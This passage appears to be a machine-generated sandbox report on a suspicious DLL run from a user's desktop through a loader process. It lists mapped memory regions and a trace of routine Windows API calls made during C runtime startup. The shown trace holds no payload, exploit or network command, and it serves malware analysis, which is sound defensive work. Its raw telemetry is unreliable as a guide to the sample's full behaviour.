0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2024 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 2025 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2026 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2027 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2028 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2029 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2030 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2031 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2032 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2033 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2034 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2035 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2036 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2037 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2038 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2039 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2040 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2041 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2042 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2043 start_va = 0x4e0000 end_va = 0x10dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 2044 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2045 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2046 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2047 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2048 start_va = 0x1200000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2049 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2050 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2051 start_va = 0x10e0000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Thread: id = 96 os_tid = 0xc9c [0034.451] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef9ec | out: lpSystemTimeAsFileTime=0x2ef9ec*(dwLowDateTime=0xe2386470, dwHighDateTime=0x1d3dfba)) [0034.451] GetCurrentProcessId () returned 0xc98 [0034.451] GetCurrentThreadId () returned 0xc9c [0034.451] GetTickCount () returned 0x17be3 [0034.451] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef9e4 | out: lpPerformanceCount=0x2ef9e4*=370892848) returned 1 [0034.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0034.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.452] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.453] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.453] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.453] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.453] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.453] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.453] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.454] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0034.454] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0034.454] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0034.454] GetCurrentThreadId () returned 0xc9c [0034.454] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"127.0.0.1\"" [0034.454] GetEnvironmentStringsW () returned 0x67908* [0034.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0034.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13209f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0034.454] FreeEnvironmentStringsW (penv=0x67908) returned 1 [0034.454] GetStartupInfoA (in: lpStartupInfo=0x2ef93c | out: lpStartupInfo=0x2ef93c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0034.454] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0034.454] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0034.454] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0034.454] SetHandleCount (uNumber=0x20) returned 0x20 [0034.454] GetLastError () returned 0x0 [0034.454] SetLastError (dwErrCode=0x0) [0034.454] GetLastError () returned 0x0 [0034.454] SetLastError (dwErrCode=0x0) [0034.454] GetLastError () returned 0x0 [0034.454] SetLastError (dwErrCode=0x0) [0034.455] GetACP () returned 0x4e4 [0034.455] GetLastError () returned 0x0 [0034.455] SetLastError (dwErrCode=0x0) [0034.455] IsValidCodePage (CodePage=0x4e4) returned 1 [0034.455] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef91c | out: lpCPInfo=0x2ef91c) returned 1 [0034.455] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef3e8 | out: lpCPInfo=0x2ef3e8) returned 1 [0034.455] GetLastError () returned 0x0 [0034.455] SetLastError (dwErrCode=0x0) [0034.455] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef378 | out: lpCharType=0x2ef378) returned 1 [0034.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef7fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef7fc, cbMultiByte=256, lpWideCharStr=0x2ef168, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0034.455] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x2ef3fc | out: lpCharType=0x2ef3fc) returned 1 [0034.455] GetLastError () returned 0x0 [0034.455] SetLastError (dwErrCode=0x0) [0034.455] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0034.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef7fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef7fc, cbMultiByte=256, lpWideCharStr=0x2ef138, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.455] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.455] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eef28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.455] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef6fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9d\x06Êô4ù.", lpUsedDefaultChar=0x0) returned 256 [0034.455] GetLastError () returned 0x0 [0034.455] SetLastError (dwErrCode=0x0) [0034.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef7fc, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0034.455] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef7fc, cbMultiByte=256, lpWideCharStr=0x2ef158, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0034.455] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0034.455] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2eef48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0034.455] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2ef5fc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9d\x06Êô4ù.", lpUsedDefaultChar=0x0) returned 256 [0034.455] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.455] GetLastError () returned 0x0 [0034.455] SetLastError (dwErrCode=0x0) [0034.455] GetLastError () returned 0x0 [0034.455] SetLastError (dwErrCode=0x0) [0034.455] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] GetLastError () returned 0x0 [0034.456] SetLastError (dwErrCode=0x0) [0034.456] 